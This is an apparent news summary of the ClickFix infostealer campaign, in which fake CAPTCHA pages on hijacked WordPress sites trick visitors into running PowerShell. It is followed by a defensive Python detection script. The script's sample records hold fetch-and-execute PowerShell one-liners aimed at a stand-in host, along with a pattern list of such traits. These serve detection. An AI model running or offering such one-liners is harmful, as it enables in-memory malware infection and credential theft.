ClickFix Drives New Infostealer Campaigns


CSO Online
Mar 18, 2026

Why It Matters

The campaign shows how quickly malicious actors can weaponize legitimate web platforms to exfiltrate credentials at scale, forcing WordPress operators to tighten access controls. Its adoption by nation‑state groups signals a broader escalation in supply‑chain‑style attacks on the web.

Key Takeaways

  • ClickFix infected 250+ WordPress sites across 12 countries
  • Attack uses fake Cloudflare CAPTCHA to deliver PowerShell payload
  • Three stealer payloads include Vidar, Impure, and Vodka
  • Malware runs entirely in memory, evading file‑based detection
  • ClickFix activity rose 517% year‑over‑year, used by nation‑state groups

Pulse Analysis

The ClickFix framework has evolved from a simple phishing trick into a sophisticated, automated supply‑chain weapon aimed at WordPress installations worldwide. By embedding malicious JavaScript behind a counterfeit Cloudflare CAPTCHA, attackers lure any visitor without an admin cookie into copying a command into a Windows dialog. The command spawns an in‑memory DoubleDonut loader that bypasses traditional file‑based AV, delivering three distinct infostealer payloads. This approach not only masks the infection from site administrators but also leverages the ubiquity of WordPress to reach a broad, unsuspecting audience.

Technically, the campaign deploys three payload families: a new Vidar‑based stealer, the .NET‑written Impure Stealer, and the C++‑based VodkaStealer. Each uses advanced evasion methods such as custom data encoding, symmetric encryption of C2 traffic, and sandbox detection via system‑time checks. The DoubleDonut loader injects the malicious code directly into legitimate Windows processes, ensuring execution stays resident in RAM and avoiding disk footprints. A parallel Microsoft‑tracked variant swaps the classic Win+R run dialog for the Windows Terminal (Win+X), further complicating detection by exploiting newer OS interfaces.

The impact is stark: ESET reports a 517% year‑over‑year surge in ClickFix activity, and the technique has been adopted by state‑sponsored groups like Lazarus, MuddyWater, and APT28. For WordPress operators, the immediate mitigation steps include restricting admin‑login exposure, enforcing strong credentials, and applying the Rapid7 YARA rules published on GitHub. Longer‑term, organizations should monitor for anomalous CAPTCHA traffic, deploy endpoint behavior analytics to catch memory‑only payloads, and integrate threat‑intel feeds that flag emerging ClickFix domains. As attackers continue to refine social‑engineering lures, proactive hardening of web assets becomes essential to prevent credential harvesting at scale.
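As an added illustration of the endpoint-side behavior analytics the article recommends (example code written for this page, not from CSO Online, ESET, Rapid7 or Microsoft), the script below flags process-creation records in which a shell is launched directly from the Win+R Run dialog (parent explorer.exe) or from Windows Terminal (the Win+X variant) with command-line traits of an in-memory download-and-execute one-liner. The key="value" record format, the trait list and the sample events are constructed assumptions, not telemetry from the campaign.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Paste hosts: explorer.exe owns the Win+R Run dialog, WindowsTerminal.exe the Win+X variant.
PASTE_HOSTS = {"explorer.exe", "windowsterminal.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Traits of a one-liner that fetches and runs code in memory (assumed list, not from the article).
SUSPICIOUS = re.compile(
    r"(-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass|\biex\b|"
    r"invoke-expression|downloadstring|\birm\b|invoke-(web|rest)(request|method)|https?://)",
    re.IGNORECASE)
_FIELD = re.compile(r'(\w+)="([^"]*)"')

@dataclass
class ProcEvent:
    parent: str   # parent image name, lower-cased, path stripped
    image: str    # child image name, lower-cased, path stripped
    cmdline: str

def parse_event(line: str) -> Optional[ProcEvent]:
    """Parse one key="value" process-creation record (constructed format)."""
    f = dict(_FIELD.findall(line))
    if not {"ParentImage", "Image", "CommandLine"}.issubset(f):
        return None
    name = lambda p: p.rsplit("\\", 1)[-1].lower()
    return ProcEvent(name(f["ParentImage"]), name(f["Image"]), f["CommandLine"])

def is_clickfix_like(ev: ProcEvent) -> bool:
    """Shell spawned directly by a paste host with at least two download/in-memory traits."""
    if ev.parent not in PASTE_HOSTS or ev.image not in SHELLS:
        return False
    traits = {m.group(0).lower() for m in SUSPICIOUS.finditer(ev.cmdline)}
    return len(traits) >= 2   # two independent traits keep routine admin use out

def scan(lines: Iterable[str]) -> List[str]:
    """Return the command lines of all events matching the pattern."""
    return [ev.cmdline for ev in map(parse_event, lines) if ev and is_clickfix_like(ev)]

# Constructed sample records, not real telemetry.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    f'ParentImage="C:\\Windows\\explorer.exe" Image="{PS}" CommandLine="powershell -w hidden -nop -c iex (irm https://example.invalid/verify)"',
    'ParentImage="C:\\Users\\u\\AppData\\Local\\Microsoft\\WindowsApps\\WindowsTerminal.exe" Image="C:\\Program Files\\PowerShell\\7\\pwsh.exe" CommandLine="pwsh -ep bypass -c Invoke-WebRequest https://example.invalid/v | iex"',
    f'ParentImage="C:\\Windows\\explorer.exe" Image="{PS}" CommandLine="powershell Get-ChildItem C:\\Users"',
    f'ParentImage="C:\\Program Files\\Git\\git-bash.exe" Image="{PS}" CommandLine="powershell -nop -c iex (irm https://example.invalid/v)"',
]
if __name__ == "__main__":
    print(scan(SAMPLE_EVENTS))   # the first two records match; the other two do not
```

The third record shows why two traits are required: an interactive PowerShell started from the Run dialog for ordinary administration is not flagged, while the fourth shows that the same one-liner from an unrelated parent falls outside this rule and needs a separate detection.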

